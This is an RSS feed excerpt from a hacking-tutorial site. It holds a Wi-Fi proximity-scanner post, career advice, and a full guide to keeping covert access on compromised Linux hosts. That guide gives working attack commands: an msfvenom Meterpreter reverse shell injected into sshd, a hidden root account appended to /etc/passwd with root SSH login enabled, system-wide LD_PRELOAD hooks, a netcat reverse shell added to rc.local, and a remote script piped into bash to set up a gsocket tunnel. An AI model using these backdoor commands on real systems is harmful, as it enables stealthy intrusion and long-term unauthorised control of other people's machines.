<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="899" height="822" src="https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu.png" alt="" class="wp-image-16720" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu.png 899w, https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu-300x274.png 300w, https://hackers-arise.com/wp-content/uploads/2025/08/hackers-arise-radar-menu-768x702.png 768w" sizes="(max-width: 899px) 100vw, 899px" /></figure>
Step #2. Real-Time Wi-Fi Scanning
 The script uses airodump-ng behind the scenes to: – Continuously scan surrounding Wi-Fi networks – Record BSSID, SSID, RSSI, channel, frequency band – Stream live updates through a structured CSV output for parsing and analysis
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="720" height="598" src="https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan.png" alt="" class="wp-image-16718" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan.png 720w, https://hackers-arise.com/wp-content/uploads/2025/08/hackersArise-Radar-scan-300x249.png 300w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
Step #3. RSSI Filtering & Analytics
 To reduce RSSI noise, the script implements a Kalman filter This Kalman filter:
 – Smooths out transient signal spikes – Creates a rolling average of RSSI per BSSID – Improves distance estimation consistency
Step #4. Estimating Distance from RSSI
 The tool calculates the distance using a log-distance path loss model such as:
 d = 10^((TX_power – RSSI) / (10 * n))
Where: – TX_power and path-loss exponent n are customizable or calculated through calibration – RSSI is dynamically filtered – Distance is measured in meters
Step #5. Calibration Engine
 The included calibration module lets you:
 – Input known RSSI and real-world distances – Fit an optimized curve per BSSID – Automatically store TX power, path-loss exponent, and R² fit for reuse – Flag poorly calibrated networks with suggestions
Step #6. Visual Mapping – Spring Model Layout
 Once enough data is gathered, the tool uses a spring-model algorithm to create a map: – Nodes (BSSIDs) are arranged based on estimated distances – Forces push/pull the layout into geometric balance – Labels show SSIDs, bands, and estimated distance in meters

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="803" height="644" src="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map.png" alt="" class="wp-image-16719" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map.png 803w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map-300x241.png 300w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-ARise-Radar-map-768x616.png 768w" sizes="(max-width: 803px) 100vw, 803px" /></figure>
Step #7. Regulatory & Power Tuning Mode
 The tool isn’t just a scanner — it includes a dedicated utility mode to:
 – Set regulatory domain (iw reg set <country_code>) – Modify TX power (in dBm) – Retrieve and display current wireless driver info – Perform diagnostics before scanning
<h2 class="wp-block-heading">Focus Mode: Tracking a Single Access Point</h2>
Sometimes you just need to follow one Wi-Fi target — whether it’s a rogue device, a signal beacon, or an access point you’re using for indoor positioning.
Hackers Arise Radar includes a specialized mode for scanning and tracking a single BSSID:
 – Select a known access point from your previously scanned list – The tool locks onto that specific MAC address using: airodump-ng –bssid <target> –channel <ch> – RSSI values are filtered using a Kalman filter – Distance estimation is updated in real-time using the calibration profile – Live updates show proximity and confidence
<h2 class="wp-block-heading">Real World Use Cases</h2>
– Wardriving Missions: Continuous logs while driving – Indoor Wireless Mapping: Signal-based AP triangulation, spatial layouts – Security & Pentesting Recon: Detect new/rogue APs, estimate proximity – Wi-Fi Optimization: Adjust regulatory domain / TX power, evaluate coverage – Wireless Simulation & Testing: Simulate RSSI data with simulate_rss_matrix.py
<h2 class="wp-block-heading">Requirements & Setup</h2>
– Platform: Linux (Kali/Debian-based) – Python: 3.7+ – Privileges: sudo required – External Tools: aircrack-ng, iw, ip, ethtool – Python Libraries: numpy, scipy, pandas, matplotlib, adjustText
Launch simply with:
 kali> sudo python3 Hackers_Arise_Radar.py
 No need to prep interfaces — the tool handles it all.
<h2 class="wp-block-heading">Summary</h2>
Hackers Arise Radar is more than just a scanner. It is a fully interactive system for Wi-Fi discovery, proximity estimation, map generation, and interface configuration — all controlled through an elegant terminal menu.
Built for hackers, engineers, educators, and hobbyists, this tool empowers you to: – Visualize your wireless environment – Optimize TX power and regulatory settings – Log and export clean data – Build wireless maps with zero GPS
Start scanning smarter — not harder.

For more information on this unique and powerful scanner, see our Wi-Fi Hacking training.
The post <a href="https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/">Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target</title>
<link>https://hackers-arise.com/advanced-linux-persistence-strategies-for-remaining-inside-a-linux-target/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Fri, 03 Oct 2025 16:40:40 +0000</pubDate>
<category><![CDATA[Command and Control (C2)]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[Linux]]></category>
<category><![CDATA[advanced linux persistence]]></category>
<category><![CDATA[configuration persistence]]></category>
<category><![CDATA[covert linux access]]></category>
<category><![CDATA[cyberwar]]></category>
<category><![CDATA[gsocket tunneling]]></category>
<category><![CDATA[HACKING]]></category>
<category><![CDATA[in-memory persistence]]></category>
<category><![CDATA[LD_PRELOAD techniques]]></category>
<category><![CDATA[linux persistence advanced]]></category>
<category><![CDATA[linux post-exploitation]]></category>
<category><![CDATA[linux red team]]></category>
<category><![CDATA[long-term access linux]]></category>
<category><![CDATA[memory-only payloads]]></category>
<category><![CDATA[os-configuration abuse]]></category>
<category><![CDATA[persistence and evasion]]></category>
<category><![CDATA[persistence guide linux]]></category>
<category><![CDATA[post-exploitation techniques]]></category>
<category><![CDATA[rc.local persistence]]></category>
<category><![CDATA[stealth persistence methods]]></category>
<category><![CDATA[stealthy backdoors]]></category>
<category><![CDATA[tunneling for persistence]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=17343</guid>
<description><![CDATA[From memory-only implants and OS configuration tricks to LD_PRELOAD hooks, rc.local startup hooks, and cloud-relay tunneling. A strategic playbook shows how advanced techniques complement basic persistence to build a resilient foothold.
The post <a href="https://hackers-arise.com/advanced-linux-persistence-strategies-for-remaining-inside-a-linux-target/">Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring hackers! 

In part one of our Linux persistence series, we covered the basics – the quick wins that keep you connected after a compromise. Now it’s time to take things up a notch. In this part, we’re going to dive into techniques that give you more flexibility, more stealth, and in some cases, more durability than the simple shell loops, autostarts, and cron jobs we looked at before.
We’ll start with in-memory payloads, where nothing ever touches disk, making them almost invisible while they’re running. Then we’ll look at persistence through operating system configuration changes. No malware needed, just some creative abuse of the system’s own settings. From there, we’ll move into LD_PRELOAD, a legitimate Linux feature that can quietly hook into processes and run our code without launching any suspicious binaries. We’ll also talk about rc.local for those times you want a simple, one-shot startup hook, and we’ll finish with gsocket, a powerful tunneling tool that can keep a connection alive even when the network is working against you.
By the end of this part, you’ll have a toolkit that covers both stealthy short-term access and long-term, hard-to-shake persistence. And if you combine what we’ve done here with the foundations from part one, you’ll have the range to adapt to just about any post-exploitation environment.
<h2 class="wp-block-heading">In-Memory</h2>
An in-memory backdoor is a persistence-adjacent technique aimed at maintaining control without leaving forensic traces on disk. Instead of writing a payload to the filesystem, you inject it directly into the memory space of a running process. This approach is attractive when stealth is a higher priority than durability, as most antivirus solutions perform limited real-time inspection of memory. Even technically adept users are unlikely to notice a malicious implant if it resides inside a legitimate, already-running process.
In this example, the chosen payload is Meterpreter, a well-known tool capable of operating entirely in memory. A typical workflow might look like this:
<code>c2 > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=C2_IP LPORT=9005 exitfunc=thread StagerRetryCount=999999 -f raw -o meter64.bin</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="106" src="https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-1024x106.webp" alt="creating an in-memory payload with msfvenom" class="wp-image-17344" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-1024x106.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-300x31.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom-768x79.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/1-creating-an-in-memory-payload-with-msfvenom.webp 1256w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Here, <code>msfvenom</code> generates a raw Meterpreter reverse TCP payload configured to connect back to our C2 at the specified host and port. 
<code>exitfunc=thread</code> controls how the payload cleans up when it finishes or encounters an error. Thread means it will terminate only the thread it is running in, leaving the rest of the host process alive. This is critical for in-memory injection into legitimate processes because it avoids crashing them and raising suspicion.
<code>StagerRetryCount=999999</code> instructs the stager to retry the connection up to 999,999 times if it fails. Without this, a dropped connection might require re-injecting the payload. With it, the backdoor keeps trying indefinitely until we are ready to receive the connection.
With <code>pgrep</code> you list processes to inject your payload into
<code>target#> pgrep -x sshd</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="393" height="87" src="https://hackers-arise.com/wp-content/uploads/2025/08/2-finding-a-system-proccess-to-inject-an-in-memory-payload-into.webp" alt="finding a process with pgrep to inject the in-memory payload into with " class="wp-image-17345" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/2-finding-a-system-proccess-to-inject-an-in-memory-payload-into.webp 393w, https://hackers-arise.com/wp-content/uploads/2025/08/2-finding-a-system-proccess-to-inject-an-in-memory-payload-into-300x66.webp 300w" sizes="(max-width: 393px) 100vw, 393px" /></figure>
<code>target#> mv /root/meter64.bin /root/mmap64.bin</code>
<code>target#> inject_linux 1032 mmap64.bin</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="725" height="294" src="https://hackers-arise.com/wp-content/uploads/2025/08/3-injecting-the-payload-into-a-proccess.webp" alt="injecting the in-memory payload with inject_linux into a process" class="wp-image-17346" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/3-injecting-the-payload-into-a-proccess.webp 725w, https://hackers-arise.com/wp-content/uploads/2025/08/3-injecting-the-payload-into-a-proccess-300x122.webp 300w" sizes="(max-width: 725px) 100vw, 725px" /></figure>
The <code>inject_linux</code> utility then injects the binary blob into the process identified by PID, causing that process to execute the payload entirely in memory. No new file is created on disk, and no service or scheduled task is registered. Note, you might need to rename your payload as <code>mmap64.bin</code>.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="928" height="145" src="https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit.webp" alt="receiving a reverse connection" class="wp-image-17347" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit.webp 928w, https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit-300x47.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/4-receiving-a-connection-on-metasploit-768x120.webp 768w" sizes="(max-width: 928px) 100vw, 928px" /></figure>
Pros: Works under any user account, extremely difficult for a human observer to detect, and avoids leaving traditional artifacts like startup entries or executable files on disk.
Cons: Does not survive a reboot. The moment the system restarts or the host process ends, the implant disappears.
While this method lacks persistence in the strict sense, it provides a highly covert foothold for as long as the target system remains powered on. In a layered intrusion strategy, in-memory implants can complement more traditional persistence mechanisms by offering an immediately available, stealthy access channel alongside longer-lived backdoors.
<h2 class="wp-block-heading">Configs</h2>
Persistence through configuration changes takes a different path from typical backdoors or reverse shells. Instead of running malicious code, it manipulates the operating system’s own settings to ensure we can regain access later. Because there is no executable payload, such changes are far less likely to trigger antivirus detection. However, this method is viable only when you have direct access to the target system and sufficient privileges to modify core configuration files.
One of the most common examples is creating a hidden user account that can be used for future remote logins. In the example:
<code>target# > openssl passwd -1 -salt test P@ssw0rd123</code>
<code>target# > echo 'post:$1$test$dIndzcyu0SmwXz37byHei0:0:0::/:/bin/sh' >> /etc/passwd</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="775" height="119" src="https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file.webp" alt="creating a hidden user with a root shell" class="wp-image-17348" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file.webp 775w, https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file-300x46.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/5-creating-a-hidden-user-in-passwd-file-768x118.webp 768w" sizes="(max-width: 775px) 100vw, 775px" /></figure>
The first command uses <code>openssl passwd</code> with the <code>-1</code> flag to generate an MD5-based hashed password (<code>-salt</code> test specifies a custom salt, here “test”) for the chosen password <code>P@ssw0rd123</code>. The output is a string in the format expected by <code>/etc/passwd</code>.
The second command appends a new entry to <code>/etc/passwd</code> for a user named post, with the generated password hash, UID 0, and GID 0 (making it equivalent to the root user), no home directory, and <code>/bin/sh</code> as its shell. This effectively creates a hidden superuser account.
Finally, make sure you have modified the <code>/etc/ssh/sshd_config</code> file to ensure that root (and by extension, the post account with UID 0) can log in over SSH (<code>PermitRootLogin yes</code>). This ensures you can reconnect remotely, provided the target system is reachable over the network.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="672" height="123" src="https://hackers-arise.com/wp-content/uploads/2025/08/6-editing-the-sshd_config.webp" alt="editing the sshd_config to allow root login" class="wp-image-17349" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/6-editing-the-sshd_config.webp 672w, https://hackers-arise.com/wp-content/uploads/2025/08/6-editing-the-sshd_config-300x55.webp 300w" sizes="(max-width: 672px) 100vw, 672px" /></figure>
After that restart the SSH service
<code>target# > service sshd restart</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="760" height="155" src="https://hackers-arise.com/wp-content/uploads/2025/08/7-connecting-to-a-host-with-a-root-user.webp" alt="connecting via ssh" class="wp-image-17350" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/7-connecting-to-a-host-with-a-root-user.webp 760w, https://hackers-arise.com/wp-content/uploads/2025/08/7-connecting-to-a-host-with-a-root-user-300x61.webp 300w" sizes="(max-width: 760px) 100vw, 760px" /></figure>
Pros:  Survives reboots, and does not require running any malicious executable.
Cons: Requires administrative or root privileges to modify system files, and is ineffective if the machine is behind NAT or a restrictive firewall that blocks inbound connections.
This method is a pure OS-level manipulation. It leaves no malicious process in memory, but its success depends entirely on your ability to later connect directly to the host. In targeted intrusions, it is often combined with other persistence methods to ensure redundancy.
<h2 class="wp-block-heading">LD_PRELOAD</h2>
Using LD_PRELOAD for persistence takes advantage of a legitimate dynamic linking feature in Linux to inject custom code into every newly launched process. The LD_PRELOAD environment variable tells the dynamic linker to load a specified shared library before any others, allowing our code to override or hook standard library functions in user-space applications. This approach can be used to execute arbitrary logic, including establishing a shell or logging credentials.
 First we create a <code>meter.c</code> file which will later be compiled into <a href="http://meter.so"><code>meter.so</code></a>
<code>target# > nano meter.c</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="816" height="213" src="https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD.webp" alt="creating a meter.c file for LD_PRELOAD persistence" class="wp-image-17351" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD.webp 816w, https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD-300x78.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/8-crafting-meter.c-for-LD_PRELOAD-768x200.webp 768w" sizes="(max-width: 816px) 100vw, 816px" /></figure>
Then the payload is compiled with the following command:
<code>c2 > gcc -fPIC -shared -o <a href="http://meter.so">meter.so</a> meter.c</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="596" height="107" src="https://hackers-arise.com/wp-content/uploads/2025/08/9-compiling-a-binary-into-meter-so.webp" alt="comping the meter.c file" class="wp-image-17352" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/9-compiling-a-binary-into-meter-so.webp 596w, https://hackers-arise.com/wp-content/uploads/2025/08/9-compiling-a-binary-into-meter-so-300x54.webp 300w" sizes="(max-width: 596px) 100vw, 596px" /></figure>
Next you write the path to your shared object (<code>meter.so</code>) into <code>/etc/ld.so.preload</code>. This file is consulted by the dynamic linker globally, meaning every dynamically linked binary will load the specified library, regardless of which user runs it. This requires root privileges.
<code>target#> echo /path/to/meter.so >> /etc/ld.so.preload</code>
Then you add an export <code>LD_PRELOAD=/path/to/meter.so</code> line to <code>/etc/profile</code>, ensuring that all users who log in through an interactive shell will have the environment variable set automatically
<code>target#> echo export LD_PRELOAD=/path/to/meter.so >> /etc/profile</code>
This command does the same but only for a single user by appending the export command to that user’s <code>~/.bashrc</code>
<code>target$> echo export LD_PRELOAD=/path/to/meter.so >> ~/.bashrc</code>
Pros: Survives reboots, works under any user account, and can be applied system-wide or per-user. It allows the injected code to run within the context of legitimate processes, making detection harder.
Cons: The execution interval is uncontrolled, as code runs only when a new process starts, so reconnection timing is less predictable than with scheduled tasks or services.
<h2 class="wp-block-heading">rc.local</h2>
Persistence via rc.local relies on a legacy startup mechanism in Linux systems. The /etc/rc.local script, if present and executable, is run automatically by the init system once at the end of the multi-user boot sequence. By inserting a command into this file, we can ensure our payload executes automatically the next time the system restarts.
<code>target#> echo "nc C2_IP 8888 -e /bin/bash &" >> /etc/rc.local</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="699" height="156" src="https://hackers-arise.com/wp-content/uploads/2025/08/10-settign-up-rc.local-persistence-with-netcat.webp" alt="creating rc.local persistence" class="wp-image-17353" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/10-settign-up-rc.local-persistence-with-netcat.webp 699w, https://hackers-arise.com/wp-content/uploads/2025/08/10-settign-up-rc.local-persistence-with-netcat-300x67.webp 300w" sizes="(max-width: 699px) 100vw, 699px" /></figure>
This appends a netcat command to <code>/etc/rc.local</code> that, when executed, connects back to our host on port 8888 and spawns <code>/bin/bash</code>, providing an interactive reverse shell. The ampersand (<code>&</code>) runs it in the background so it does not block the rest of the boot process.
Because <code>rc.local</code> executes only once during startup, the payload will not continuously attempt reconnection. It will run a single time after each reboot. If the connection fails at that moment, for instance, if your listener is not ready or the network link is down, no further attempts will be made until the next reboot.
Pros: Survives reboots and is simple to implement.
Cons: Requires root privileges to modify <code>/etc/rc.local</code>, and the execution interval is uncontrolled, it runs only once per boot, offering no retry mechanism between reboots.
While this method is straightforward and low-profile, it is limited in reliability. In modern Linux distributions, <code>rc.local</code> is often disabled by default or replaced by systemd service files, making it more of a legacy technique. For attackers seeking long-term, automated persistence, it’s usually combined with other methods that retry connections or run continuously.
<h2 class="wp-block-heading">Gsocket</h2>
Gsocket is a cloud relay both sides connect to, linking their outbound connections into a single encrypted two-way tunnel. From our perspective as attackers, that’s gold: we don’t need an open inbound port on the victim, we don’t have to wrestle with NATs or port-forwards, and a single cloud broker becomes a C2 for many targets. Long-lived outbound TLS-like streams blend into normal egress traffic, so the connection looks far less suspicious than an exposed listener.
We like Gsocket, because it massively reduces operational overhead. There is less infrastructure to maintain and much better success rates in restrictive networks because everything is outbound.
Here is how you install it on the target:
<code>target# > bash -c "$(wget --no-verbose -O- <a href="https://gsocket.io/y">https://gsocket.io/y</a>)"</code>
<code>target$ > bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="773" height="311" src="https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket.webp" alt="installing gs-netcat on the target" class="wp-image-17354" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket.webp 773w, https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket-300x121.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/11-setting-up-gsocket-768x309.webp 768w" sizes="(max-width: 773px) 100vw, 773px" /></figure>
Next, install it on your C2 and access it with the secret key
<code>c2 > sudo apt install gsocket</code>
<code>c2 > gs-netcat -s “secret key” -i</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="833" height="458" src="https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket.webp" alt="installing gs-netcat and connecting to the target" class="wp-image-17355" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket.webp 833w, https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket-300x165.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket-768x422.webp 768w" sizes="(max-width: 833px) 100vw, 833px" /></figure>
More information can be found here:
<a href="https://www.gsocket.io/deploy">https://www.gsocket.io/deploy</a>
Pros: A stealthy way to establish remote access, pivot, exfiltrate data, or maintain a backdoor, especially in complex network environments.
Cons: Leaves traces, like persistent scripts or network access patterns and reliance on a shared secret requires careful secret management.
<h2 class="wp-block-heading">Summary</h2>
In part two, we stepped away from the basics and explored persistence and access techniques that push deeper into stealth and adaptability. We started with in-memory backdoors, great for situations where avoiding detection matters more than surviving a reboot. We then moved on to persistence through config changes, such as creating hidden users in <code>/etc/passwd</code>, which survive reboots without needing any malicious process running. After that, we covered LD_PRELOAD, a dynamic linker trick that quietly injects code into normal processes. We looked at <code>rc.local</code> for quick, legacy-style startup hooks, and wrapped up with gsocket, a tunneling tool that can keep a lifeline open even through restrictive firewalls or NAT.
Together, these two parts give you a layered approach: fast, simple persistence to hold your ground, plus stealthy, advanced techniques to stay in control for the long haul.The post <a href="https://hackers-arise.com/advanced-linux-persistence-strategies-for-remaining-inside-a-linux-target/">Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>How to Find an Entry-Level Job in Cybersecurity</title>
<link>https://hackers-arise.com/how-to-find-an-entry-level-job-in-cybersecurity/</link>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Thu, 02 Oct 2025 18:21:15 +0000</pubDate>
<category><![CDATA[Career]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18429</guid>
<description><![CDATA[Welcome back, my aspiring cyberwarriors! So many of you have written me about the difficulties of finding an entry-level job in cybersecurity that I thought I should offer you some of my insights. At this moment in history, artificial intelligence (AI) is making it particularly difficult to find that entry-level job as companies are using […]
The post <a href="https://hackers-arise.com/how-to-find-an-entry-level-job-in-cybersecurity/">How to Find an Entry-Level Job in Cybersecurity</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
So many of you have written me about the difficulties of finding an entry-level job in cybersecurity that I thought I should offer you some of my insights. At this moment in history, artificial intelligence (AI) is making it particularly difficult to find that entry-level job as companies are using AI to fulfill these tasks. 
Here are my thoughts on the best approach to landing that first job in cybersecurity!

The best way to get a starting level job in cybersecurity is to combine industry certifications, hands-on skills development, networking, and relevant IT experience or education.
<h2 class="wp-block-heading"></h2>
<h2 class="wp-block-heading">Step #1. Build Foundations and Skills</h2>
<ul class="wp-block-list">
<li>Study the basics: Networking, operating systems (especially Linux), system administration, scripting (e.g., Python), and security fundamentals. You can gain this background from my books <a href="https://amzn.to/3VMwrEE" title="">Linux Basics for Hackers</a>, <a href="https://amzn.to/4gVlNVR" title="">Network Basics for Hackers</a> and, my upcoming, Python Basics for Hackers.</li>
<li>Use free online resources, cybersecurity blogs (such as Hackers-Arise.com), YouTube (David Bombal, Yaniv Hoffman, Network Chuck), for practical, hands-on labs.</li>
<li>Learn basic programming—while not always required, scripting helps with automation and troubleshooting.</li>
</ul>
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="359" src="https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-1024x359.png" alt="" class="wp-image-18546" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-1024x359.png 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-300x105.png 300w, https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-768x269.png 768w, https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1.png 1150w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h2 class="wp-block-heading">Step #2. Get Industry-Recognized Certifications</h2>
<ul class="wp-block-list">
<li>Start with CompTIA Security+ — the most respected entry-level cert; many entry-level jobs list it as a requirement.</li>
<li>Consider Network+ for networking fundamentals, or more specialized options like SSCP, GCIH.</li>
<li>Certifications signal employers you know security basics and are serious about the field.</li>
</ul>
<h2 class="wp-block-heading">Step #3. Pursue Hands-On Experience</h2>
<ul class="wp-block-list">
<li>Apply for IT/help desk, junior admin, or tech support roles—these are common stepping stones into security.</li>
<li>Take on internships, volunteer for IT/security projects, or contribute to open-source security initiatives. There are multiple open-source projects where you can gain hands-on experience without going through the hiring process. This indicates a strong commitment to cybersecurity and can help get past the “no experience” threshold. Hackers-Arise always has multiple open-source projects in our discord server.</li>
<li>Build a personal “home lab” environment to practice tools and attacks in a legal, safe manner. You can accomplish this inexpensively and without needing an Internet connection using VmWare or VirtualBox.</li>
</ul>
<h2 class="wp-block-heading">Step #4. Network and Get Involved</h2>
<ul class="wp-block-list">
<li>Attend local security meetups, online communities (Reddit, LinkedIn, Twitter), and conferences to build professional connections. This can also include the Hackers-Arise Discord server and community.</li>
<li>Connect with cybersecurity practitioners for insight, mentorship, and potential referrals.</li>
</ul>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="468" height="82" src="https://hackers-arise.com/wp-content/uploads/2025/10/best-community-hands-down.png" alt="" class="wp-image-18545" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/best-community-hands-down.png 468w, https://hackers-arise.com/wp-content/uploads/2025/10/best-community-hands-down-300x53.png 300w" sizes="(max-width: 468px) 100vw, 468px" /></figure>
<h2 class="wp-block-heading">Step #5. Tailor Your Resume and Apply Broadly</h2>
<ul class="wp-block-list">
<li>Document hands-on skills, home lab work, certifications, and transferable skills from any IT roles.</li>
<li>Customize your resume for each job and be ready to explain your skills and learning journey in interviews.</li>
<li>Explore entry-level roles such as SOC analyst, junior pentester, security technician, and IT support with a security focus.</li>
</ul>
<hr class="wp-block-separator has-alpha-channel-opacity"/>
<h2 class="wp-block-heading">Summary</h2>
<ul class="wp-block-list">
<li>Certifications + hands-on learning = fastest path to entry-level roles.</li>
<li>Network and build connections in the security community—it’s often who you know that helps get a foot in the door.</li>
<li>Apply even if you don’t meet every listed requirement: employers want passion, constant learning, and initiative in entry-level candidates.</li>
</ul>
This blended approach maximizes your chances of breaking into cybersecurity quickly, even without prior professional experience.The post <a href="https://hackers-arise.com/how-to-find-an-entry-level-job-in-cybersecurity/">How to Find an Entry-Level Job in Cybersecurity</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</title>
<link>https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Thu, 02 Oct 2025 16:59:22 +0000</pubDate>
<category><![CDATA[Command and Control (C2)]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Metasploit]]></category>
<category><![CDATA[Powershell]]></category>
<category><![CDATA[Windows]]></category>
<category><![CDATA[advanced persistence]]></category>
<category><![CDATA[AppInit DLL injection]]></category>
<category><![CDATA[cyberwarfare]]></category>
<category><![CDATA[HACKING]]></category>
<category><![CDATA[HKCU persistence]]></category>
<category><![CDATA[LSASS persistence]]></category>
<category><![CDATA[offensive security]]></category>
<category><![CDATA[Office registry keys]]></category>
<category><![CDATA[post-exploitation]]></category>
<category><![CDATA[privilege abuse]]></category>
<category><![CDATA[reboot survival]]></category>
<category><![CDATA[red team tactics]]></category>
<category><![CDATA[registry persistence]]></category>
<category><![CDATA[stealth backdoors]]></category>
<category><![CDATA[Windows persistence]]></category>
<category><![CDATA[Winlogon hijack]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=17878</guid>
<description><![CDATA[Learn registry-based Windows persistence with AppInit DLLs, LSASS packages, Winlogon hijacks, and Office keys. These methods survive reboots.
The post <a href="https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/">Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors! 
